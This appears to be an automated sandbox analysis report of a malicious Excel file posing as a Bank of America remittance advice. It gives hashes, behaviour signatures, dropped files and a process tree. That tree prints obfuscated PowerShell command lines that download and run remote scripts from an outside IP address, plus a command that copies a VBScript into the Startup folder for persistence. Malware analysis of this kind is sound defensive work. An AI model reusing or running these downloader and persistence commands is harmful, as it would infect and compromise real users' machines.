Overview

overview

10

Static

static

8

BofA_Remit...ce.xls

windows7-x64

10

BofA_Remit...ce.xls

windows10-2004-x64

10

Analysis

  • max time kernel
    100s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-08-2022 18:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    BofA_Remittance_Advice.xls

  • Size

    122KB

  • MD5

    4b46967dd9b0cc889a71879e74c78163

  • SHA1

    f4ab4a4754ba6815e6ba8adb03f68d9ea2edd39a

  • SHA256

    d1300974e16f75b2fd0deeb5b4f212f2d1c9eb0d77bc51664c4dfbcdca4beb63

  • SHA512

    b7bd17bc20af7daf04f201e2d4fc2a73ad3e9e1c7c97d9451ca4e0a62d777ae469b356d5b8191e50020411f51a4b1c42fade07c6ed6196af0355298b6c2aef81

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 30 IoCs
    adwarespyware
  • Modifies registry class 3 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\BofA_Remittance_Advice.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4792
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\eCGVm.js"
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4732
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.pdr\''+pmet:vne$,''sbv.enixam/31.02.721.902//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\rdp.vbs');remove-item ($env:appdata + '\eCGVm.js')
        3⤵
        • Blocklisted process makes network request
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1596
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\rdp.vbs"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1316
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110010,00110000,00111001,00101110,00110001,00110010,00110111,00101110,00110010,00110000,00101110,00110001,00110011,00101111,01101101,01100001,01111000,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };$o00='ZE000'.replace('Z','I').replace('000','x');sal P $o00;([system.String]::Join('', $gf))|P
            5⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3116
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\Admin\AppData\Local\Temp\rdp.vbs' -Destination 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rdp.vbs'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1836
  • C:\Program Files (x86)\Internet Explorer\ielowutil.exe
    "C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
    1⤵
      PID:2380
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2096
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2096 CREDAT:17410 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:228

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    Query Registry

    3
    T1012

    System Information Discovery

    4
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      3KB

      MD5

      556084f2c6d459c116a69d6fedcc4105

      SHA1

      633e89b9a1e77942d822d14de6708430a3944dbc

      SHA256

      88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

      SHA512

      0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      71444def27770d9071039d005d0323b7

      SHA1

      cef8654e95495786ac9347494f4417819373427e

      SHA256

      8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

      SHA512

      a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      493B

      MD5

      a0ea5a424d8fb4f7e0876814f065a146

      SHA1

      403a6a320323be563156a00a9bbd5a99c4696f53

      SHA256

      8a05c725768ca7664b52d5b3ed3e4b1630f554a6f8f0a75479fce3dbc068063b

      SHA512

      bde42eee5a25c4bd0cd0a6ff411e1749f9b44d9d01f568b1f3c412e8fc0a78a019c353d693792c4d2ccc89ed200f62c2c3e2f712ccf4f05fc52415985388ef60

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\rdp.vbs
      Filesize

      2KB

      MD5

      b53758dd50ce606eaa76ab0c58ae4b34

      SHA1

      6e7b58e1b6211b2985de1b025bb98a4ec1bfc733

      SHA256

      efc8b02481aee3a35928036674d959f24cc05eea59a9dff66a3962474b7a57c0

      SHA512

      46ea6773fbb07d12987855575f5b865e55a3832ac0343a6d24816333454069bf98276192859a6fcb2e88c4ed3b0f6ac62c787a4faf5c87fc2afe1f794e4b4053

      Download Submit
    • C:\Users\Admin\AppData\Roaming\eCGVm.js
      Filesize

      697B

      MD5

      11dd19502a428b8ffc6c72023819b556

      SHA1

      6748e6d4ec8d3d6323d576a7aaeedb512d2219e2

      SHA256

      7ecabb37878d51ef75f59f4682823018cf89bd48e840ad2452cd16d47974b5a6

      SHA512

      b8573163b2b91aff8bc082cadb44c0af9fb5bfc47829bd010f3bd755e66293641893a92134956425b34f5f921bdaa0dfe9b257a998d3940b2a03e8d69d8af2ba

      Download Submit
    • memory/1316-144-0x0000000000000000-mapping.dmp
      Download
    • memory/1596-146-0x00007FFFD42B0000-0x00007FFFD4D71000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/1596-141-0x0000000000000000-mapping.dmp
      Download
    • memory/1596-142-0x00000133EE6F0000-0x00000133EE712000-memory.dmp
      Filesize

      136KB

      Download
    • memory/1596-143-0x00007FFFD42B0000-0x00007FFFD4D71000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/1836-151-0x00007FFFD3B50000-0x00007FFFD4611000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/1836-148-0x0000000000000000-mapping.dmp
      Download
    • memory/3116-153-0x00007FFFD3B50000-0x00007FFFD4611000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/3116-155-0x00007FFFD3B50000-0x00007FFFD4611000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/3116-147-0x0000000000000000-mapping.dmp
      Download
    • memory/3116-152-0x00007FFFD3B50000-0x00007FFFD4611000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4732-139-0x0000000000000000-mapping.dmp
      Download
    • memory/4792-134-0x00007FFFBCD90000-0x00007FFFBCDA0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4792-135-0x00007FFFBCD90000-0x00007FFFBCDA0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4792-136-0x00007FFFBCD90000-0x00007FFFBCDA0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4792-137-0x00007FFFBAAF0000-0x00007FFFBAB00000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4792-132-0x00007FFFBCD90000-0x00007FFFBCDA0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4792-133-0x00007FFFBCD90000-0x00007FFFBCDA0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4792-138-0x00007FFFBAAF0000-0x00007FFFBAB00000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4792-157-0x00007FFFBCD90000-0x00007FFFBCDA0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4792-158-0x00007FFFBCD90000-0x00007FFFBCDA0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4792-159-0x00007FFFBCD90000-0x00007FFFBCDA0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4792-160-0x00007FFFBCD90000-0x00007FFFBCDA0000-memory.dmp
      Filesize

      64KB

      Download